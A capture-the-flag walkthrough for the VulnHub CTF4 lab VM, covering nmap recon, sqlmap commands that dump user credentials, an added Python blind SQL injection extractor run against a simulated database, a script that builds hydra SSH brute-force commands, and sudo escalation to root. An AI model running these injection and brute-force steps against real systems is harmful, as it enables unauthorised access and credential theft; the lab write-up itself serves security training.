VulnHub: CTF4


Host discovery

Scan the subnet with nmap to find the target's IP address:

sudo nmap 192.168.169.1/24


The target's IP is 192.168.169.143.

Port scanning

Probe the target's open ports with nmap; -A adds service/version detection, OS fingerprinting and the default NSE scripts.
The results show ports 22 (OpenSSH 4.3), 25 (Sendmail 8.13.5) and 80 (Apache 2.2.0) open; 631 (ipp) is reported closed and the remaining ports are filtered. The robots.txt on port 80 disallows /mail/, /restricted/, /conf/, /sql/ and /admin/, which is worth noting before browsing the site.

kali@kali:~$ sudo nmap -A 192.168.169.143
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-19 10:45 EDT
Nmap scan report for 192.168.169.143
Host is up (0.00027s latency).
Not shown: 996 filtered ports
PORT    STATE  SERVICE VERSION
22/tcp  open   ssh     OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
|   1024 10:4a:18:f8:97:e0:72:27:b5:a4:33:93:3d:aa:9d:ef (DSA)
|_  2048 e7:70:d3:81:00:41:b8:6e:fd:31:ae:0e:00:ea:5c:b4 (RSA)
25/tcp  open   smtp    Sendmail 8.13.5/8.13.5
| smtp-commands: ctf4.sas.upenn.edu Hello [192.168.169.129], pleased to meet you, ENHANCEDSTATUSCODES, PIPELINING, EXPN, VERB, 8BITMIME, SIZE, DSN, ETRN, DELIVERBY, HELP,
|_ 2.0.0 This is sendmail version 8.13.5 2.0.0 Topics: 2.0.0 HELO EHLO MAIL RCPT DATA 2.0.0 RSET NOOP QUIT HELP VRFY 2.0.0 EXPN VERB ETRN DSN AUTH 2.0.0 STARTTLS 2.0.0 For more info use "HELP <topic>". 2.0.0 To report bugs in the implementation send email to 2.0.0 sendmail-bugs@sendmail.org. 2.0.0 For local information send email to Postmaster at your site. 2.0.0 End of HELP info
80/tcp  open   http    Apache httpd 2.2.0 ((Fedora))
| http-robots.txt: 5 disallowed entries
|_/mail/ /restricted/ /conf/ /sql/ /admin/
|_http-server-header: Apache/2.2.0 (Fedora)
|_http-title:  Prof. Ehks
631/tcp closed ipp
MAC Address: 00:0C:29:73:BF:CB (VMware)
Device type: general purpose|proxy server|remote management|terminal server|switch|WAP
Running (JUST GUESSING): Linux 2.6.X|3.X|4.X (98%), SonicWALL embedded (95%), Control4 embedded (95%), Lantronix embedded (95%), SNR embedded (95%), Dell iDRAC 6 (94%)
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:sonicwall:aventail_ex-6000 cpe:/h:lantronix:slc_8 cpe:/h:snr:snr-s2960 cpe:/o:dell:idrac6_firmware cpe:/o:linux:linux_kernel:3.10 cpe:/o:linux:linux_kernel:4.1
Aggressive OS guesses: Linux 2.6.16 - 2.6.21 (98%), Linux 2.6.13 - 2.6.32 (96%), SonicWALL Aventail EX-6000 VPN appliance (95%), Control4 HC-300 home controller (95%), Lantronix SLC 8 terminal server (Linux 2.6) (95%), SNR SNR-S2960 switch (95%), Linux 2.6.8 - 2.6.30 (94%), Linux 2.6.9 - 2.6.18 (94%), Dell iDRAC 6 remote access controller (Linux 2.6) (94%), Linux 2.6.18 - 2.6.32 (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: ctf4.sas.upenn.edu; OS: Unix


TRACEROUTE
HOP RTT     ADDRESS
1   0.27 ms 192.168.169.143


OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.32 seconds


Start with port 80.

The following link looks like it may be vulnerable to SQL injection (note the numeric id parameter):

192.168.169.143/index.html?page=blog&title=Blog&id=2

Injection

Test it with sqlmap.
First grab the DBMS banner and list the databases:

kali@kali:~$ sqlmap -u "192.168.169.143/index.html?page=blog&title=Blog&id=2" --banner --dbs


List the tables in the calendar database:

kali@kali:~$ sqlmap -u "192.168.169.143/index.html?page=blog&title=Blog&id=2" --banner -D calendar --tables


List the columns of the phpc_users table:

kali@kali:~$ sqlmap -u "192.168.169.143/index.html?page=blog&title=Blog&id=2" --banner -D calendar -T phpc_users --columns


Dump the username and password columns from the table:

kali@kali:~$ sqlmap -u "192.168.169.143/index.html?page=blog&title=Blog&id=2" --banner -D calendar -T phpc_users -C "username,password" --dump


The user information in the ehks database is obtained the same way (same sqlmap workflow, with -D ehks).
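The script below is an added example, not code from the walkthrough and not part of CTF4. It simulates the injectable id parameter with an in-memory SQLite database, shows the three-request boolean check that sqlmap automates when it decides a parameter is injectable, and then recovers the DBMS version (what --banner returns) and a credential row (what --dump returns) blind, one true/false question at a time. The table names, rows and the alice:hunter2 credential are constructed; a hardened handler that binds the parameter is included for contrast, and the same probes do nothing against it.

```python
"""Boolean-based blind SQL injection, demonstrated against a simulated backend.

Added example (not code from the walkthrough): an in-memory SQLite database
stands in for the CTF4 blog backend, and vulnerable_page() builds its query by
string concatenation the way an injectable ?page=blog&id=2 handler would.
All rows below are constructed sample data, not the real CTF4 contents.
"""
import sqlite3

SQLITE_VERSION = sqlite3.sqlite_version  # what the "banner" probe should recover


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE blog (id INTEGER, title TEXT)")
    con.executemany("INSERT INTO blog VALUES (?, ?)",
                    [(1, "First post"), (2, "Second post"), (3, "Third post")])
    # constructed stand-in for calendar.phpc_users
    con.execute("CREATE TABLE phpc_users (username TEXT, password TEXT)")
    con.execute("INSERT INTO phpc_users VALUES ('alice', 'hunter2')")
    return con


def vulnerable_page(con, id_param):
    """Injectable handler: the id parameter is pasted straight into the SQL."""
    sql = "SELECT title FROM blog WHERE id=" + id_param
    try:
        rows = con.execute(sql).fetchall()
    except sqlite3.Error:
        return "error"  # a DB error still yields a distinguishable page
    return rows[0][0] if rows else "no post"


def safe_page(con, id_param):
    """Hardened handler: the value is bound as a parameter, never parsed as SQL."""
    try:
        post_id = int(id_param)
    except ValueError:
        return "no post"
    rows = con.execute("SELECT title FROM blog WHERE id=?", (post_id,)).fetchall()
    return rows[0][0] if rows else "no post"


def is_boolean_injectable(page, base_id):
    """Differential check: a TRUE clause must keep the baseline page, a FALSE one must change it."""
    baseline = page(base_id)
    return (page(f"{base_id} AND 1=1") == baseline
            and page(f"{base_id} AND 1=2") != baseline)


def blind_length(page, base_id, expr, max_len=64):
    """Recover length(expr) one boolean question at a time."""
    baseline = page(base_id)
    for n in range(1, max_len + 1):
        if page(f"{base_id} AND length({expr})={n}") == baseline:
            return n
    return None


def blind_extract(page, base_id, expr, length):
    """Recover expr character by character, binary-searching each code point."""
    baseline = page(base_id)
    out = []
    for i in range(1, length + 1):          # SQLite substr() is 1-indexed
        lo, hi = 32, 126                    # printable ASCII
        while lo < hi:
            mid = (lo + hi) // 2
            probe = f"{base_id} AND unicode(substr({expr},{i},1))>{mid}"
            if page(probe) == baseline:     # TRUE: the character is above mid
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


def demo(handler=vulnerable_page):
    """Run the chain (detect -> banner -> credentials) against one handler."""
    con = make_db()
    page = lambda p: handler(con, p)
    result = {"injectable": is_boolean_injectable(page, "2")}
    if not result["injectable"]:
        return result
    ver = "sqlite_version()"
    result["version"] = blind_extract(page, "2", ver, blind_length(page, "2", ver))
    cred = "(SELECT username||':'||password FROM phpc_users LIMIT 1)"
    result["credential"] = blind_extract(page, "2", cred, blind_length(page, "2", cred))
    return result


if __name__ == "__main__":
    print("vulnerable handler:", demo(vulnerable_page))
    print("hardened handler:  ", demo(safe_page))
```

Every probe here is of the form `2 AND <condition>`, which is why the real request must be compared against a baseline response rather than checked for an error: the vulnerable page never errors, it just silently returns "no post" when the condition is false. sqlmap runs the same comparison, with many more payload shapes, and on a real target you would throttle the requests rather than loop as fast as this simulation does.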

Brute force

Try the recovered accounts and passwords against SSH.
Build username and password wordlists from the dumped data,

then brute-force the logins with hydra,

and log in over SSH.
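Added example (Python, not the walkthrough's own tooling): it turns a sqlmap --dump CSV into deduplicated hydra wordlists, separates out values that look like hex digests rather than plaintext passwords (those should be cracked offline, not replayed at sshd), and assembles the hydra SSH command line. The CSV contents are constructed sample data; the target address is the one from the scan above, and the file names are assumptions.

```python
"""Build hydra wordlists from a sqlmap --dump CSV and assemble the SSH brute-force command.

Added example, not the walkthrough's own tooling. SAMPLE_DUMP is constructed
sample data in the shape sqlmap writes to its dump/<db>/<table>.csv (a header
row, then one record per line); the real CTF4 credentials are not reproduced.
"""
import csv
import io
import os
import re

SAMPLE_DUMP = """\
username,password
alice,hunter2
bob,5f4dcc3b5aa765d61d8327deb882cf99
alice,hunter2
"""

# MD5 / SHA-1 / SHA-256 hex digests
HEX_HASH = re.compile(r"^(?:[0-9a-f]{32}|[0-9a-f]{40}|[0-9a-f]{64})$")


def looks_like_hash(value):
    """A dumped 'password' that is a hex digest must be cracked, not used as-is."""
    return bool(HEX_HASH.match(value.lower()))


def wordlists_from_dump(csv_text):
    """Return (users, passwords, hashes), each deduplicated with order preserved."""
    users, passwords, hashes = [], [], []
    for row in csv.DictReader(io.StringIO(csv_text)):
        user = (row.get("username") or "").strip()
        secret = (row.get("password") or "").strip()
        if user and user not in users:
            users.append(user)
        if not secret:
            continue
        bucket = hashes if looks_like_hash(secret) else passwords
        if secret not in bucket:
            bucket.append(secret)
    return users, passwords, hashes


def write_lists(users, passwords, directory="."):
    """Write users.txt / passwords.txt (assumed names) and return their paths."""
    user_file = os.path.join(directory, "users.txt")
    pass_file = os.path.join(directory, "passwords.txt")
    with open(user_file, "w") as f:
        f.write("\n".join(users) + "\n")
    with open(pass_file, "w") as f:
        f.write("\n".join(passwords) + "\n")
    return user_file, pass_file


def hydra_command(target, user_file, pass_file, tasks=4):
    """hydra argv: -L/-P wordlists, -t parallel tasks, -f stop at the first
    valid pair, -e nsr also try empty / login-as-password / reversed login.
    Keep tasks low against sshd: it drops connections when hammered."""
    return ["hydra", "-L", user_file, "-P", pass_file, "-t", str(tasks),
            "-f", "-e", "nsr", f"ssh://{target}"]


if __name__ == "__main__":
    users, passwords, hashes = wordlists_from_dump(SAMPLE_DUMP)
    if hashes:
        print("hash-like values (crack these first):", hashes)
    user_file, pass_file = write_lists(users, passwords)
    print(" ".join(hydra_command("192.168.169.143", user_file, pass_file)))
```

Once hydra reports a working pair, log in with `ssh <user>@192.168.169.143`; the rest of the walkthrough continues from that shell.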

Privilege escalation

sudo -l shows the user may run any command with no restrictions,

so sudo su switches straight to root.

NowSec